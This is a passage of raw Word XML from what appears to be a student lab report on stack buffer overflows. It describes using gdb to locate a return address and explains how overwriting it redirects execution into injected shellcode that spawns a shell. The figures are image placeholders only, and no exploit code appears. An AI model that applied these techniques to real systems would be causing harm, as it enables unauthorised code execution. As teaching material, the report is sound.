        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4959363C" wp14:editId="77F59BF6">
            <wp:extent cx="5943600" cy="12350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235075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="089C0E16" w14:textId="58BAD1B5" w:rsidR="004F5949" w:rsidRDefault="004F5949" w:rsidP="004F5949">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120BF4AF" w14:textId="6FB68E93" w:rsidR="004F5949" w:rsidRDefault="004F5949" w:rsidP="004F5949">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="498895A9" w14:textId="7DC286C6" w:rsidR="004F5949" w:rsidRDefault="004F5949" w:rsidP="004F5949">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 8 and Figure 9 shows the investigation of the addresses using “gdb” command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB95557" w14:textId="230BA461" w:rsidR="004F5949" w:rsidRDefault="004F5949" w:rsidP="004F5949">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10ADD271" w14:textId="6B62B3CA" w:rsidR="004F5949" w:rsidRDefault="004F5949" w:rsidP="004F5949">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6008AEA9" wp14:editId="0344399B">
            <wp:extent cx="5943600" cy="28130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13050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44984D56" w14:textId="20FCBD1A" w:rsidR="004F5949" w:rsidRDefault="004F5949" w:rsidP="004F5949">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEF4A77" w14:textId="69087DA9" w:rsidR="00D80A4F" w:rsidRDefault="00D80A4F" w:rsidP="004F5949">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C9B2B6" w14:textId="553ED7EC" w:rsidR="00D80A4F" w:rsidRDefault="00D80A4F" w:rsidP="00D80A4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5199C9E6" wp14:editId="523BA53C">
            <wp:extent cx="5943600" cy="3563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63620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EE4C81" w14:textId="12E7A5BC" w:rsidR="00D80A4F" w:rsidRDefault="00D80A4F" w:rsidP="00D80A4F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FB6C62" w14:textId="057DA624" w:rsidR="004F5949" w:rsidRDefault="004F5949" w:rsidP="004F5949">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="405B61C2" w14:textId="6FF9402D" w:rsidR="00047C51" w:rsidRDefault="00047C51" w:rsidP="00047C51">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Here, we can see that when calling function() the RET will be 0x08049d55 and we want to jump past the assignment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481FF64F" w14:textId="77777777" w:rsidR="000F5EE3" w:rsidRPr="00047C51" w:rsidRDefault="000F5EE3" w:rsidP="00047C51">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3205E3D4" w14:textId="4073B9FC" w:rsidR="004F5949" w:rsidRDefault="004F5949" w:rsidP="004F5949">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 10 shows the running of the above code which gives an error </w:t>
      </w:r>
      <w:r w:rsidR="00AE421B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>saying,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “Segmentation fault.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E273FC3" w14:textId="32B2D78F" w:rsidR="00AE421B" w:rsidRDefault="00AE421B" w:rsidP="00AE421B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="120448B7" w14:textId="68FF6D4C" w:rsidR="00AE421B" w:rsidRDefault="00AE421B" w:rsidP="00AE421B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45437734" wp14:editId="4E428544">
            <wp:extent cx="5943600" cy="12757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75715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A10F685" w14:textId="0D390733" w:rsidR="00AE421B" w:rsidRDefault="00AE421B" w:rsidP="00AE421B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD5E27A" w14:textId="2B5E4FF1" w:rsidR="000F5EE3" w:rsidRDefault="000F5EE3" w:rsidP="00AE421B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DDB071E" w14:textId="72F817C7" w:rsidR="000F5EE3" w:rsidRDefault="000F5EE3" w:rsidP="000F5EE3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-270" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.  Shell Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B521F5" w14:textId="7F32302E" w:rsidR="000F5EE3" w:rsidRDefault="00A547EC" w:rsidP="00A547EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A547EC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Now that we understand how we can modify the return address and control the program's execution flow, the next step is to determine the desired program we want to execute. In most cases, we aim to spawn a shell, which allows us to execute additional commands. However, if the program being exploited does not already have the desired code, we can place our own arbitrary instructions in the buffer we are overflowing. By overwriting the return address, we can redirect the program's execution back into the buffer where our custom code resides.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436F5E5B" w14:textId="22839676" w:rsidR="001B461D" w:rsidRDefault="001B461D" w:rsidP="00A547EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D2FF8B2" w14:textId="2464979D" w:rsidR="001B461D" w:rsidRDefault="001B461D" w:rsidP="00A547EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4219186F" w14:textId="57CB2F38" w:rsidR="001B461D" w:rsidRDefault="001B461D" w:rsidP="00A547EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28DF4978" w14:textId="4DBB76D8" w:rsidR="001B461D" w:rsidRDefault="001B461D" w:rsidP="00A547EC">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lastRenderedPageBreak/>
        <w:t>a.  Figure 11 shows the C code to spawn a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCB2751" w14:textId="2BB02904" w:rsidR="001B461D" w:rsidRDefault="001B461D" w:rsidP="00A547EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20224915" w14:textId="14C156B4" w:rsidR="001B461D" w:rsidRDefault="001B461D" w:rsidP="00A547EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2339C906" wp14:editId="19CAD104">
            <wp:extent cx="5943600" cy="18649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864995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5827FF78" w14:textId="2AEBF695" w:rsidR="001B461D" w:rsidRDefault="001B461D" w:rsidP="001B461D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395F79B0" w14:textId="1ECC1A53" w:rsidR="001B461D" w:rsidRDefault="001B461D" w:rsidP="001B461D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="171A9D46" w14:textId="4DAB8816" w:rsidR="001B461D" w:rsidRDefault="001B461D" w:rsidP="001B461D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">b.  To find out what it looks like in assembly we compile it and start up gdb. Figure </w:t>
      </w:r>
      <w:r w:rsidR="00DF1EEF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>12 shows the compilation of the above code.</w:t>
      </w:r>
      <w:r w:rsidR="00062ADD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> We have to use the -static flag. Otherwise, the actual code for the execve system call will not be included. Instead there will be a reference to dynamic C library that would normally be linked at load time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4CB8FC" w14:textId="106197A2" w:rsidR="00DF1EEF" w:rsidRDefault="00DF1EEF" w:rsidP="001B461D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B02CD8A" w14:textId="612B219E" w:rsidR="00DF1EEF" w:rsidRDefault="00DF1EEF" w:rsidP="001B461D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44A1C5E7" wp14:editId="2E17C69C">
            <wp:extent cx="5943600" cy="14662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466215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB58729" w14:textId="67B9A425" w:rsidR="00DF1EEF" w:rsidRDefault="00DF1EEF" w:rsidP="00DF1EEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DB1CDF" w14:textId="0BEF7367" w:rsidR="00BB5C3D" w:rsidRDefault="00BB5C3D" w:rsidP="00DF1EEF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C2AE877" w14:textId="07A2A79D" w:rsidR="00BB5C3D" w:rsidRDefault="00BB5C3D" w:rsidP="00BB5C3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">c.  </w:t>
      </w:r>
      <w:r w:rsidR="00811968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 13 shows the gdb command that is being run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0604D76E" w14:textId="02C93C94" w:rsidR="00811968" w:rsidRDefault="00811968" w:rsidP="00BB5C3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D25B448" w14:textId="5A2FDEC5" w:rsidR="00811968" w:rsidRDefault="001537E7" w:rsidP="00BB5C3D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63C5DA0F" wp14:editId="2EFDD061">
            <wp:extent cx="5943600" cy="3644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644900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79821AFB" w14:textId="1FE5DB01" w:rsidR="001537E7" w:rsidRDefault="001537E7" w:rsidP="001537E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500F7D72" w14:textId="7D4C4E36" w:rsidR="001537E7" w:rsidRDefault="001537E7" w:rsidP="001537E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7361589D" w14:textId="21D53DC3" w:rsidR="001537E7" w:rsidRDefault="00C60E21" w:rsidP="001537E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0" w:right="-360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">d.  </w:t>
      </w:r>
      <w:r w:rsidR="000D4482">
        <w:rPr>
